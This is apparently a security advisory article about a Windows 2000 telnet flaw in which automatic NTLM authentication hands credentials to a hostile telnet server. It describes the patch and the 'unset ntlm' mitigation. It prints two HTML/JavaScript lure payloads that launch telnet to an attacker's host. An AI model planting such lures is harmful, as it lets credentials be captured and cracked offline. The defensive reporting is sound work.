Windows Authentication Exposes Telnet

Telnet, the mainstay of remote management for decades, got a feature enhancement in Windows 2000 that might streamline the logon process, but could also expose user authentication credentials to a hacker. Microsoft has recently released a patch that eliminates a security vulnerability in Windows 2000 telnet client. The bug could allow a malicious user to trick an unsuspecting victim into automatically starting a telnet session with the hacker's telnet server, thereby transmitting critical user authentication information to that server. With the help of KeyLabs, BugNet was able to reproduce this bug that affects all Windows 2000 users. The vulnerability occurs because of a new authentication feature added to Windows 2000's telnet.exe. The feature lets telnet automatically authenticate with NTLM-enabled telnet servers (i.e. Windows 2000 Telnet

Servers). NTLM is the standard authentication used by Windows products. It uses a challenge/response mechanism to confirm a user's identity without sending the password across the wire. Telnet or not to telnet? The problem is that NTLM authentication happens automatically and by default whenever telnet is launched. So if a malicious user could entice a victim into initiating a telnet session with a tricked server, then the malicious user could capture the victim's authentication credentials. Capturing the credentials by itself does not put the victim's computer at risk, nor does it allow the hacker to gain access to the victim's computer. It does, however, give the hacker enough information to launch an off-line brute force attack aimed at ascertaining the plain-text password. Because this attack is handled off-line, the user and the system administrator are none the wiser, and the malicious user could take as much time as needed to get the password. This begs the question, how might a malicious user entice a victim into establishing a remote telnet session? The answer is quite simple. Because pretty much all versions of Internet Explorer and Outlook will launch telnet when they encounter "telnet://hostname" in a carefully constructed HTML reference, the malicious user would only have to create a reference on a web page or in an e-mail message. The referenced command could be as simple as: <meta http-equiv="refresh" content="0;URL=telnet://hostname"> Or, if you prefer JavaScript: <script>window.open("telnet://target")</script> Despite the insidiousness of this vulnerability, there are some simple solutions. First, you can install the Microsoft patch. The fix is small and makes for a quick download. Install the patch by running the downloaded executable. No other user intervention is required, except for the mandatory system restart. So when installing the patch on a server, wait until restarting the server will have the least impact on the users. Unlike Windows 9x and Windows NT, Windows 2000 is the only version that has this problem. Once installed, the patch will warn the user whenever telnet tries to authenticate outside the "Trusted sites" or the "Local Intranet" zones. The warning reads like this: "You are about send your password information to a remote computer in the Internet zone. This might be unsafe. Do you want to send anyway(y/n):" The second method for protecting a Windows 2000 system running telnet.exe involves disabling NTLM authentication on the telnet client. A Microsoft security bulletin on this vulnerability explains how to disable all NTLM telnet authentications. Issuing the command "unset ntlm" from the telnet command line will prevent telnet from automatically authenticating via NTLM. To check the status of telnet authentication, enter the command "display" from the telnet command prompt. If the "Not Auth (NTLM)" is displayed, then Microsoft's challenge/response is turned off. Telnet has been around for a while. With some companies, telnet is the primary tool for managing network devices like servers and routers. Based on our test, BugNet recommends that all Windows 2000 users consider installing this patch.